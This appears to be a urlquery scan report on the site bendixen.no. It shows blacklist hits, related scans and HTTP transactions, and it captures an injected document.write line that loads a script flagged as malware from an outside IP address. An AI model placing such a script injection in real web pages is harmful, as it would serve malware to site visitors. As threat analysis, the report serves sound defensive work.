Overview

URL bendixen.no/
IP164.132.160.172
ASN
Location Italy
Report completed2019-05-28 16:33:52 CEST
StatusLoading report..
urlquery Alerts Suspicious javascript obfuscation


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2019-05-28 2 www.bendixen.no/wp-includes/js/jquery/jquery.js Malware
2019-05-28 2 134.249.116.78/jquery.js Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 164.132.160.172

Date UQ / IDS / BL URL IP
2019-06-07 17:00:30 +0200
0 - 0 - 1 osloflagg.no/ 164.132.160.172
2019-06-07 16:39:49 +0200
0 - 0 - 1 gakk.no/ 164.132.160.172
2019-06-07 16:35:08 +0200
1 - 0 - 2 bendixen.no/ 164.132.160.172
2019-06-07 16:07:23 +0200
0 - 0 - 1 hjembu.no/ 164.132.160.172
2019-06-07 16:03:32 +0200
0 - 0 - 1 vitapharma.no/ 164.132.160.172
2019-06-07 15:49:15 +0200
0 - 0 - 15 jabjorkeli.no/ 164.132.160.172
2019-06-06 10:03:23 +0200
0 - 0 - 1 vitapharma.no/ 164.132.160.172
2019-06-06 09:52:39 +0200
0 - 0 - 15 jabjorkeli.no/ 164.132.160.172
2019-06-06 07:41:45 +0200
0 - 0 - 2 urmet.no/we/index.html 164.132.160.172
2019-06-06 07:41:44 +0200
0 - 0 - 1 www.urmet.no/we/index.html 164.132.160.172

Last 10 reports on ASN:

Date UQ / IDS / BL URL IP
2019-07-02 09:48:15 +0200
0 - 0 - 0 https://www.imdb.com/list/ls049696316/ 143.204.52.228
2019-07-02 09:48:17 +0200
0 - 0 - 0 https://www.imdb.com/list/ls049696333/ 143.204.52.228
2019-07-02 09:48:03 +0200
0 - 0 - 0 https://www.spreaker.com/show/ver-peru-x-urug (...) 52.51.101.146
2019-07-01 11:37:34 +0200
0 - 0 - 0 https://www.tig-uk.com/tts/nbn4298k3o7tvns8vp (...) 144.217.235.30
2019-07-01 11:37:22 +0200
0 - 0 - 0 https://www.tig-uk.com/tts/nbn4298k3o7tvns8vp (...) 144.217.235.30
2019-07-01 11:36:59 +0200
0 - 0 - 0 https://healthadviserpro.com/power-efficiency (...) 108.179.246.37
2019-07-01 11:35:37 +0200
0 - 0 - 0 https://www.imdb.com/list/ls049291106/ 143.204.52.228
2019-07-01 11:31:59 +0200
0 - 0 - 1 https://fp.bwjf.cn/downInvoice/98d3884f381b46 (...) 39.107.217.15
2019-07-01 11:28:01 +0200
0 - 0 - 0 https://d9.flashtalking.com/d9core 52.211.104.166
2019-07-01 11:27:51 +0200
0 - 0 - 0 https://www.launchora.com/story/123movies-wat (...) 52.38.238.5

Last 10 reports on domain: bendixen.no

Date UQ / IDS / BL URL IP
2019-06-07 16:35:08 +0200
1 - 0 - 2 bendixen.no/ 164.132.160.172
2019-06-05 14:34:19 +0200
1 - 0 - 2 bendixen.no/ 164.132.160.172
2019-06-05 04:35:28 +0200
1 - 0 - 2 bendixen.no/ 164.132.160.172
2019-06-03 02:33:47 +0200
1 - 0 - 2 bendixen.no/ 164.132.160.172
2019-06-02 16:33:47 +0200
1 - 0 - 2 bendixen.no/ 164.132.160.172
2019-05-28 16:38:21 +0200
1 - 0 - 2 bendixen.no/ 164.132.160.172
2019-05-27 20:33:08 +0200
1 - 0 - 2 bendixen.no/ 164.132.160.172
2019-05-27 10:33:17 +0200
1 - 0 - 2 bendixen.no/ 164.132.160.172
2019-05-27 00:33:42 +0200
1 - 0 - 2 bendixen.no/ 164.132.160.172
2019-05-26 14:33:30 +0200
1 - 0 - 2 bendixen.no/ 164.132.160.172


JavaScript

Executed Scripts (5)


Executed Evals (0)


Executed Writes (1)

#1 JavaScript::Write (size: 55, repeated: 1) - SHA256: b1247cfc4a293243fe51e76445f0c7fbdec493b931a59e722826bf77015b9514

                                        < script src = "http://134.249.116.78/jquery.js" > < /script>
                                    


HTTP Transactions (11)


Request Response
                                        
                                            GET / HTTP/1.1 
Host: bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         164.132.160.172
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Tue, 28 May 2019 14:33:14 GMT
Server: Apache
Location: http://www.bendixen.no/
Content-Length: 231
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   231
Md5:    14989e8e914e9fb4b6a2dadeaae3fe08
Sha1:   9c6c048fc20c88c70880c59253a85b307612f3a2
Sha256: 8f5df8ea3c44cfdbb5ad785ccdbd059e64e95710da2c0ebc9f3e77bbecb6de8d
                                        
                                            GET / HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-7
                                        
Date: Tue, 28 May 2019 14:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.6.40, PleskLin
Cache-Control: max-age=0; private
Content-Length: 2108
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   2108
Md5:    4b3109b3ab1dfc7aade96cfa68130715
Sha1:   6e752cb51bb02d263cd0f3899b280ee08b99779a
Sha256: b2b2f15e5018e2ea5a5f085f85622d4f42af09a9be140e365b6a326d3af850c1
                                        
                                            GET /wp-content/plugins/coming-soon/themes/default/style.css HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bendixen.no/

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Tue, 28 May 2019 14:33:15 GMT
Server: Apache
Last-Modified: Thu, 08 Feb 2018 19:49:15 GMT
Etag: "bf1-564b8b4e29f2a"
Accept-Ranges: bytes
Content-Length: 3057
X-Powered-By: PleskLin
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII C program text
Size:   3057
Md5:    b8d7077b1b872667ac2caff6f1907302
Sha1:   a78c2ba19d72ac867ffaf2a3195c4640998b0d44
Sha256: f5bdf566b34eeef2b0e03c2eb43042b1acecd2e40876cdebafcb8af6cd14abb2
                                        
                                            GET /wp-includes/js/jquery/jquery.js HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bendixen.no/

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 28 May 2019 14:33:15 GMT
Server: Apache
Last-Modified: Thu, 08 Feb 2018 19:45:52 GMT
Etag: "1ae-564b8a8c81c00"
Accept-Ranges: bytes
Content-Length: 430
X-Powered-By: PleskLin
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines, with no line terminators
Size:   430
Md5:    f29120bd8c33ec6329f68f36e4d028ac
Sha1:   6afb6fae0854b7689a394c6d72e924dd8d1196ae
Sha256: 93d935495f7f40deaf07b68afea7d4c953e14914a28b10412498ccd26fa859bb

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/coming-soon/themes/default/js/modernizr.min.js HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bendixen.no/

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 28 May 2019 14:33:15 GMT
Server: Apache
Last-Modified: Thu, 08 Feb 2018 19:49:15 GMT
Etag: "1c37-564b8b4e2be6a"
Accept-Ranges: bytes
Content-Length: 7223
X-Powered-By: PleskLin
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII C program text, with very long lines
Size:   7223
Md5:    858df1f1db6792962739c073a501039e
Sha1:   8f6f2d3f67d4ad50eb5d20e426228c69e3079b25
Sha256: fe3e2395a7aed8d3a915a0a9a32c18d01409e0f65343d6fd6a58d3a9738d0c28
                                        
                                            GET /wp-content/plugins/coming-soon/themes/default/js/script.js HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bendixen.no/

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 28 May 2019 14:33:15 GMT
Server: Apache
Last-Modified: Thu, 08 Feb 2018 19:49:15 GMT
Etag: "45fa-564b8b4e2be6a"
Accept-Ranges: bytes
Content-Length: 17914
X-Powered-By: PleskLin
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII C program text, with very long lines
Size:   17914
Md5:    e5cc3f75fcbddc786fa7171d1c4be4f7
Sha1:   fad7b076a5ce398061c219a213af5bb5291e6d50
Sha256: 000aa44ab7528a8de4aeb26865ac9f674019e119136a18d2e7b2e5d5649c0375
                                        
                                            GET /wp-content/plugins/coming-soon/themes/default/bootstrap/js/bootstrap.js HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bendixen.no/

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 28 May 2019 14:33:15 GMT
Server: Apache
Last-Modified: Thu, 08 Feb 2018 19:49:15 GMT
Etag: "e4a5-564b8b4e2aeca"
Accept-Ranges: bytes
Content-Length: 58533
X-Powered-By: PleskLin
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII C program text
Size:   58533
Md5:    cf1cf2fce27179c0de8a71c73b378f07
Sha1:   44a69a91c82f22941f0fd8c9f1c459eca33d8dbe
Sha256: d88949ad637b040b893c651e938b80f8a1aabc350c94c01c28e8a38fadab2df3
                                        
                                            GET /wp-content/plugins/coming-soon/themes/default/bootstrap/css/bootstrap.min.css HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bendixen.no/

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Tue, 28 May 2019 14:33:15 GMT
Server: Apache
Last-Modified: Thu, 08 Feb 2018 19:49:15 GMT
Etag: "1dc09-564b8b4e2aeca"
Accept-Ranges: bytes
Content-Length: 121865
X-Powered-By: PleskLin
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines, with no line terminators
Size:   121865
Md5:    ff595e039e4769a799c5f6c6852fc393
Sha1:   26108da08efc93d402632b318a411a87b7e2fd8b
Sha256: efed1b475941af7251638e000616bc486433165fd99c9f6caee01610b95ad1fc
                                        
                                            GET /jquery.js HTTP/1.1 
Host: 134.249.116.78
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bendixen.no/

                                         
                                         134.249.116.78
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 28 May 2019 14:33:19 GMT
Server: Apache/2.4.34 (Win32) PHP/7.2.10
Last-Modified: Sat, 11 May 2019 16:32:59 GMT
Etag: "12f2-5889f3c7d003e"
Accept-Ranges: bytes
Content-Length: 4850
Connection: close


--- Additional Info ---
Magic:  ASCII C++ program text, with very long lines
Size:   4850
Md5:    af723815beb1683ba61ccd25a7fde688
Sha1:   ed6c7f9eac74f74076eb19fc622acff44c810cc2
Sha256: b55378c9041f1e443cc2f3651bee6d7d2639856c274dd3280234b6beac5d0fed

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: image/vnd.microsoft.icon
                                        
Date: Tue, 28 May 2019 14:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.6.40, PleskLin
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: image/vnd.microsoft.icon
                                        
Date: Tue, 28 May 2019 14:33:18 GMT
Server: Apache
X-Powered-By: PHP/5.6.40, PleskLin
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---